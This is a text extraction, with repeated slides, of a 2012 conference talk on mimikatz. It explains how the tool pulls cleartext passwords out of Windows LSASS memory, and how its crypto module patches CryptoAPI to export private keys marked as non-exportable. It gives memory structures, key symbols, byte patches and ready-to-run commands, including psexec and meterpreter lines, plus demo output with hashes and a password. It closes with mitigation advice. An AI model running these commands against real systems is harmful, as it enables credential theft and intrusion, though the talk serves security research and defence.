ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
